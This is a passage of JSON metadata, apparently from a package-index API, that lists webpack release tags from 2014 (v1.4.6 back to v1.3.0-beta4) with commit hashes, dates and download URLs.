yste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://co